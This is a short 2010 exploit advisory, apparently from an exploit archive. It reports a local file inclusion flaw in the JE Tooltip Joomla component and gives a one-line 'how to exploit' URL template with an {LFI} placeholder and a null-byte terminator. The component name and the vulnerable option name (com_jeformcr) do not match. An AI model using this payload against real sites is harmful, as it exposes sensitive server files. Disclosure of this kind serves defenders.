47 lines
No EOL
1.7 KiB
Text
47 lines
No EOL
1.7 KiB
Text
---------------------------------------------------------------------------------
|
|
joomla component & plugin JE Tooltip Local File Inclusion
|
|
---------------------------------------------------------------------------------
|
|
|
|
Author : Chip D3 Bi0s
|
|
Group : LatinHackTeam
|
|
Email & msn : chipdebios[alt+64]gmail.com
|
|
Date : 11 March 2010
|
|
Critical Lvl : Moderate
|
|
Impact : Exposure of sensitive information
|
|
Where : From Remote
|
|
---------------------------------------------------------------------------
|
|
|
|
Affected software description:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
|
|
Application : JE Tooltip (component and plugin)
|
|
version : 1.0
|
|
Developer : Hardik Mistry
|
|
License : GPL type : Commercial
|
|
Date Added : 11 March 2010
|
|
Demo : http://joomlaextensions.co.in/formcreator/
|
|
|
|
Download : http://joomlaextensions.co.in/extensions/joomla-module.html?page=shop.product_details&category_id=4&flypage=flypage.tpl&product_id=51&vmcchk=1
|
|
|
|
Description :
|
|
|
|
JE Tooltip new Joomla 1.5 native MVC component and plugin that allows you to enter a word that you want to put on tool tip word. User can put the unlimited tooltips.
|
|
|
|
Below steps follow for installation:-
|
|
Go to Joomla Installation and install the component and plugin.
|
|
After that you can create tooltip on specific words on your entire website.
|
|
---------------------------------------------------------------------------
|
|
|
|
Vulnerable file: jeformcr.php
|
|
|
|
--------------------
|
|
|
|
how to exploit
|
|
|
|
http://192.168.0.1/index.php?option=com_jeformcr&view={LFI}%00
|
|
|
|
|
|
+++++++++++++++++++++++++++++++++++++++
|
|
[!] Produced in South America
|
|
+++++++++++++++++++++++++++++++++++++++ |